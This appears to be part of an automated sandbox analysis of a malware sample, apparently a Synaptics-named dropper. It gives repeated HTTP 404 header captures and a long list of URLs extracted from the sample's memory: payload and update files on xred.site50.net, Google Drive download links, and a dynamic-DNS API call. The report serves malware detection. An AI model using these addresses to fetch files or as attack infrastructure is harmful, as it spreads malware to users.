ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7hJMt4oSp2IxZFnYnEtaRuxCb5r-4375Tq40RwTgXsDV3Hub6upU6SlNqkR7bS_YAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:31 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_JcuSFna3hBFD-RJiBhzJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5UUxZqRUPDo_pyCXd14vXOoJJVgQCgWSjlpHRiBvt4fYZstKPd0nZ8T0E5L-8DuAKkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:31 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-dbZHivfAaM3-m_kwhVXF3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7WTuj94rufFDqZtwG7pxZoPH3_rR-ldvJA6TcgU5y2S8yRp6CpMZZNerOCl1lR-3-iEv1UpDEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:32 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-8PMB9QibpD4S_cZPFcA4Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6WLcS0ld8Wbl-pvK-Of99jMkw-S8PkJqPMC-fJgoCWFNBnzpaPpGMnw7c9ZGc6Z9JTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:33 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WF6MBzeexB25fcpvlSVXSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC54S44jTpunVyL1JvdIZcMCDlQ96wc37R4z45DYbxl2xjECfjVKCLBLjEpExgy92w3KContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:34 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_ke4b_5EzedudC5u9u1axg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ibPmzOI1Lii0TxKIZx3GBxaI2KXhUOn74MPldB8H2GXMefFtQh8NytzOidJH7jkGTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:34 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-xpP2zZ-6zwRAmLyEzrh1CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC50k40grudO0XMsDfqpLCiiqFXU8d3mLVHX4IKPEBh9vlC7ehNdzkLwSz7Lo0YEXWGueZEhfTgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:35 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-SRHZKpJusfQ3tOce-mYiEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4kgWIAoXPJEafRG-rBzAmLgMy_lUI4GLoGRNz-3itIi6_xEVeSd6WfscHCY21D7MClQcT4HOYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BflQQ2cwIyt5scdNY40m-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4fNsXOw2LOxqHCNCOgyYfGaUahACuTzxpUCpRf2e94KO4Z3AyfJ-uwZ7_ao_MEKJ95Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:37 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-y5SqVzsoxvKSwlq2B5I9vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6qIAKt0tAYw7GvBkbLPvtjEtuMy-DUbUU4RjFzBqdWjoDcyLViv0R1Nv1fz-H8lgHdh7ilCMcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-ZOAkT6HPPce_1-6RJ2easQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: RCX6FEC.tmp.0.dr String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978:
Source: ._cache_222.exe, 00000002.00000002.3272917400.000000000443D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-score.com/checkip/Kw
Source: Amcache.hve.20.dr String found in binary or memory: http://upx.sf.net
Source: RCX6FEC.tmp.0.dr String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
Source: RCX6FEC.tmp.0.dr String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH)O
Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: RCX6FEC.tmp.0.dr String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: RCX6FEC.tmp.0.dr String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.m&
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/G
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/j
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download00
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0C
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0C.O
                              Source: Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0x54d
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download12
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1G
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1a
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1j
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2k
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5.aO
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download53
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5M
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5Z
                              Source: Synaptics.exe, 00000003.00000002.2692702017.000000001B0BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5h
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.0000000000775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7B-N
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8B
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8B&N
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8_
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9=
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9F
